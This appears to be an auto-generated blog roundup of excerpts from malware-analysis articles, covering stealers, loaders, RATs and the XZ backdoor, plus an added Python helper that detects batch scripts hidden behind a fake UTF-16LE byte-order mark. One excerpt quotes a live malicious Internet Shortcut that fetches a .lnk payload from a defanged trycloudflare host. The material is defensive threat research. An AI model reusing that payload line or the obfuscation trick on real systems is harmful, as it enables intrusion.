Analysis Memo

A place to record malware analyses I have tried and anything that seemed useful for analysis.

4n6 Week 26 – 2024 - MALWARE

This entry was auto-generated and posted to show the opening of each article introduced in This Week in 4n6 (FourAndSix = Forensics), so that the articles worth reading can be skimmed quickly. The 4n6 roundup itself can be found here.

MALWARE

ASEC

Since web servers are externally exposed to provide web services to all available users, they have long been major targets for threat actors. AhnLab SEcurity Intelligence Center (ASEC) is monitoring attacks against vulnerable web servers that have unpatched vulnerabilities or are being poorly managed, and is sharing the attack cases that have been confirmed through its ASEC Blog. ASEC recently identified attack cases where a Korean medical institution was targeted, resulting in the ins...

AhnLab SEcurity intelligence Center (ASEC) has recently discovered malware being distributed through CMD files and identified it as a downloader called DBatLoader (ModiLoader) that had been distributed before via phishing emails in RAR file format containing an EXE file. The file contained “FF, FE” which means “UTF-16LE”, so when the internal code was opened with a text editor, the content of the code was not displayed correctly. Figure 1. Code not displayed correctly However, if “FF, FE” is del...

AhnLab SEcurity intelligence Center (ASEC) has discovered the distribution of a new type of malware that is disguised as cracks and commercial tools. Unlike past malware, which performed malicious behaviors immediately upon being executed, this malware displays an installer UI, and the malicious behaviors are executed upon clicking buttons during the installation process. It is deemed that when the user makes a download request, malware is instantly created to give a reply instead of distributing pr...

Baris Dincer

Blackberry

Threat Analysis Insight: RisePro Information Stealer. RESEARCH & INTELLIGENCE / 06.26.24 / The BlackBerry Research and Intelligence Team. Summary: RisePro is a multifunctional information-stealer often sold on underground forums as part of a Malware-as-a-Service (MaaS) offering. Although this malware family was initially observed in late 2022, a sharp increase of activity surrounding this malware was detected by BlackBerry during the latter end o...

Cybereason

Written By Cybereason Security Services Team Cybereason Security Services issues Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them. In this Threat Analysis report, Cybereason Security Services investigate the rising activity of the malware GootLoader. KEY POINTS Don't stop me now: GootLoader remains in active use and development by threat actors, with no loss of popularit...

Dr Josh Stroschein – The Cyber Yeti

YouTube video

Emanuele De Lucia

Posted on 25 June 2024 by edelucia. Unveiling Obfuscated Batch Scripts: From UTF-8 to UTF-16 BOM Conversion. This morning I observed an Internet Shortcut file (sha256:0817cd8b0118e2f023342ad016ef443fd4c2e4657a373f9023807a231d16b0fa – Fattura Elettronica 11817929720.url) designed to compromise an Italian organization, containing these instructions: [InternetShortcut] URL=file://hook-border-surf-spencer[.]trycloudflare[.]com@SSL/DavWWWRoot/SC700T[.]lnk IDList= HotKey=0 [{00021...
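The ASEC CMD-file entry above and De Lucia's post describe the same obfuscation: a plain single-byte batch script with the two UTF-16LE byte-order-mark bytes (FF FE) prepended. An editor or scanner that honours the BOM decodes the whole file as UTF-16LE and shows unreadable symbol soup, while cmd.exe, which reads batch files as single-byte text and does not honour a BOM, only sees a junk first line and then runs the rest. The following Python is an added example, not code from either post. It constructs a small benign sample (the payload line is a placeholder) and shows the editor view, an approximation of the cmd.exe view (cp1252 is assumed as the ANSI code page), and a triage check that flags the BOM/body mismatch and recovers the script.

```python
"""Triage helper for the 'UTF-16LE BOM on top of an ASCII batch file' trick.

Added example, not code from the ASEC or De Lucia posts. The samples below
are constructed; the payload line is a harmless placeholder.
"""

UTF16LE_BOM = b"\xff\xfe"

# Constructed sample: the FF FE bytes sit in front of ordinary ASCII lines.
SAMPLE_OBFUSCATED = (
    UTF16LE_BOM
    + b"@echo off\r\n"
    + b"powershell -w hidden -c \"Start-Sleep 1\"\r\n"  # placeholder payload line
    + b"exit\r\n"
)

# Constructed control sample: a real UTF-16LE file (BOM plus two-byte code units).
SAMPLE_GENUINE = UTF16LE_BOM + "@echo off\r\necho hi\r\n".encode("utf-16-le")

# Bytes that a plain single-byte batch script is expected to consist of.
_PRINTABLE_ASCII = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def classify_bom_script(data: bytes) -> tuple:
    """Return (verdict, recovered_text).

    verdict is one of:
      'no-bom'           no UTF-16LE BOM at the start
      'genuine-utf16le'  BOM followed by text that really is UTF-16LE
      'bom-over-ascii'   BOM followed by plain 7-bit text (the trick)
      'undecodable'      BOM but the body decodes as neither
    """
    if not data.startswith(UTF16LE_BOM):
        return "no-bom", data.decode("utf-8", errors="replace")
    body = data[2:]
    # Real UTF-16LE text in the ASCII range has a NUL in every second byte;
    # a fake BOM over a 7-bit script has no NULs and only printable bytes.
    if body and all(b in _PRINTABLE_ASCII for b in body):
        return "bom-over-ascii", body.decode("ascii")
    try:
        return "genuine-utf16le", body.decode("utf-16-le")
    except UnicodeDecodeError:
        return "undecodable", ""


def editor_view(data: bytes) -> str:
    """What a BOM-honouring editor shows: the whole file decoded as UTF-16."""
    return data.decode("utf-16", errors="replace")


def cmd_view(data: bytes) -> list:
    """Approximation of how cmd.exe consumes the file: single-byte text with the
    BOM not honoured. cp1252 is assumed as the ANSI code page, so the two BOM
    bytes turn the first line into 'ÿþ@echo off', a command cmd.exe rejects
    before carrying on with the following lines."""
    return data.decode("cp1252", errors="replace").splitlines()


if __name__ == "__main__":
    for name, blob in (("obfuscated", SAMPLE_OBFUSCATED), ("genuine", SAMPLE_GENUINE)):
        verdict, text = classify_bom_script(blob)
        print(f"{name}: {verdict}")
        print("  editor sees :", repr(editor_view(blob)[:24]))
        print("  cmd sees    :", cmd_view(blob))
        print("  recovered   :", repr(text))
```

Run it on a real sample by reading the file in binary mode and passing the bytes to `classify_bom_script`; a verdict of `bom-over-ascii` is the signal to strip the first two bytes before feeding the script to any text-based tooling.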

Hassan Faizan at Forcepoint

Cara Lin at Fortinet

By Cara Lin | June 27, 2024. Affected Platforms: Microsoft Windows. Impacted Users: Microsoft Windows. Impact: The stolen information can be used for future attack. Severity Level: High. Spyware is malicious software engineered to covertly monitor and gather information from a user’s computer without their awareness or consent. It can record activities like keystrokes, browsing behavior, and personal information, often transmitting this data to a third par...

HackTheBox

We explore the key capabilities of this Cuttlefish Malware through the lens of the MITRE ATT&CK framework. Howard Poston, Jun 27 2024. Table of contents: How Cuttlefish works; Initial infection; Cuttlefish startup; Hijacking traffic to private IPs; Collecting credentials from public traffic; VPN and proxy capabilities; Cuttlefish in MITRE and HTB; HTB and MITRE ATT&CK mapped skills development. The Cuttlefish Malware is a recent zero-click malware variant identified and analyzed by Lumen Technologies’ Bla...

Baran S at K7 Labs

Posted by Baran S, June 25, 2024. Android Stealer Trojan SpyMax – An Android RAT targets Telegram Users. Threat actors are constantly working on novel ways to target users across the globe. This blog is about SpyMax, an Android RAT that targets Telegram users. A point to be noted is that this RAT does not require the targeted device to be rooted, making it easier for the threat actors to do the intended damage. SpyMax is a Remote Administration Tool (RAT) that has...

Jérôme Segura at Malwarebytes

Posted: June 27, 2024 by Jérôme Segura On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads. The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of ...

Durgesh Sangvikar, Yanhui Jia, Chris Navarrete and Matthew Tennis at Palo Alto Networks

By: Durgesh Sangvikar, Yanhui Jia, Chris Navarrete, Matthew Tennis. Published: 26 June, 2024 at 3:00 AM PDT. Categories: Malware, Threat Research. Tags: Cobalt Strike, Malleable C2 profile. Executive Summary: In this article, Unit 42 researchers detail recent findings of malicious Cobalt Strike in...

Rapid7

Jun 27, 2024 (last updated Fri, 28 Jun 2024 18:00:03 GMT). The following Rapid7 analysts contributed to this research: Leo Gutierrez, Tyler McGraw, Sarah Lee, and Thomas Elkins. Executive Summary: On Tuesday, June 18th, 2024, Rapid7 initiated an investigation into suspicious activity in a customer environment. Our investigation identified that the suspicious behavior was emanating from the installation of Notezilla, a program that allows for the creation of sticky notes on a Win...

RevEng.AI Blog

Executive Summary RevEng.AI observed a Latrodectus sample (a.k.a. Unidentified 111, Lotus, BLACKWIDOW, IceNova) delivery chain using a malicious JavaScript (JS) stager uploaded to a third-party public malware scanning service on 23 June 2024. Since early January until the present, RevEng.AI has observed versions 1.1 to 1.3 in operational use by the adversary (although earlier versions do exist, as documented by industry reporting [1]). Latrodectus is a loader typically delivered by phishing emai...

Lucija Valentić at ReversingLabs

The history of the package is a lesson in why tracking open source threats is such a challenge — and highlights the value of RL's new Spectra Assure Community. Blog author: Lucija Valentić, Software Threat Researcher, ReversingLabs. ReversingLabs researchers have made it a priority to monitor public, open source repositories for malicious packages that may lurk on them in recent years. The number and frequency of malicious packages has increased steadily as malicious actors turn to s...

RussianPanda

RussianPanda Case Study The GlorySprout ads surfaced on the XSS forum at the beginning of March 2024 (the name makes me think of beansprout; perhaps the seller behind the stealer is a vegetarian). The stealer, developed in C++, is available for purchase at $300, offering lifetime access and 20 days of crypting service, which encrypts the stealer’s payload to evade detection. Similar to other stealers, it includes a pre-built loader, Anti-CIS execution, and a Grabber module (which is non-function...

Anderson Leite and Sergey Belov at Securelist

Incidents, 24 Jun 2024. Table of contents: Key findings; Detailed analysis; ED448-encrypted public key extraction – x86-based steganography; Payload decryption and signature check; Payload signature check; Backdoor commands; Bypass SSH authentication; Remote command execution via ‘system’ call; The mm_answer_keyallowed hook; Log hiding capabilities; Conclusion. Authors: Anderson Leite, Sergey Belov. Part 1: XZ backdoor story – Initial analysis. Part 2: Assessing the Y, and How, of the XZ Utils incident (social ...

Security Onion

Thanks to Brad Duncan for sharing this pcap from 2024-05-14 on his malware traffic analysis site! Due to issues with Google flagging a warning for the site, we're not including the actual hyperlink but it should be easy to find. We did a quick analysis of this pcap on the NEW Security Onion 2.4.80: ://blog.securityonion.net/2024/06/security-onion-2480-now-available.html If you'd like to follow along, you can do the following: install Security Onion 2.4.80 in a VM: ://docs.securityonion.net/en/2.4/first...

SonicWall

By Security News, June 24, 2024. The SonicWall Capture Labs threat research team has been tracking StrelaStealer for a long time. Recently, in the third week of June, we observed a huge spike in JavaScript spreading StrelaStealer. StrelaStealer specifically steals Outlook and Thunderbird email credentials. The infection chain looks like previous versions of StrelaStealer except major checks have been added to avoid infecting systems in Russia. We are continuing to observe its target regions limited ...

By Security News, June 27, 2024. Overview: This week, the SonicWall Capture Labs threat research team investigated a sample of Orcinius malware. This is a multi-stage trojan that is using Dropbox and Google Docs to download second-stage payloads and stay updated. It contains an obfuscated VBA macro that hooks into Windows to monitor running windows and keystrokes and creates persistence using registry keys. Infection Cycle: The initial infection method is an Excel spreadsheet, in this case, “CALENDARI...

By Security News, June 27, 2024. DarkMe RAT steals information from victims’ machines and responds to various commands received from its Command and Control (C&C) server. A spike in distributing DarkMe RAT was observed in February 2024, exploiting the zero-day (CVE-2024-21412) by the hacking group Water Hydra. The SonicWall threat research team recently analyzed a variant of the DarkMe RAT malware. Execution of DarkMe RAT starts from a Windows Shortcut File (LNK) which uses a Microsoft Installer Fil...

System Weakness

Ahmed Mohamed Ibrahim , Shubham Singh, and Sunil Bharti at Trend Micro

Examining Water Sigbin's Infection Routine Leading to an XMRig Cryptominer. We analyze the multi-stage loading technique used by Water Sigbin to deliver the PureCrypter loader and XMRIG crypto miner. By: Ahmed Mohamed Ibrahim, Shubham Singh, Sunil Bharti, June 28, 2024. Summary: Water Sigbin continues to exploit CVE-2017-3506 and CVE-2023-21839 to deploy cryptocurrency miners via a PowerShell script. The threat actor employs fileless execution techniques,...

Zhassulan Zhussupov

﷽ Hello, cybersecurity enthusiasts and white hackers! Like in the previous malware development trick example, this post is just for showing Proof of Concept. In the practice example with Telegram API, the attacker has one weak point: if the victim’s computer does not have a Telegram client or let’s say that messengers are generally prohibited in the victim’s organization, then you must agree that interaction with Telegram servers may raise suspicion (whether through a bot or not). ...

Padvish Malware Threat Database

Backdoor.Win32.Tofsee, 2024-06-30. General description. Type: Trojan (backdoor). Damage level: High. Prevalence: Medium. Malware names: Backdoor.Win32.Tofsee (Padvish); A Variant Of Win32/Tofsee.AJ (ESET); Backdoor:Win32/Hostil.gen!A (Microsoft); HEUR:Trojan.Win32.Generic (Kaspersky). What is backdoor malware? Backdoor malware is a program that lets attackers bypass a system's security mechanisms and hands various resources of that system over to the intruders through that route. Attackers can, with ...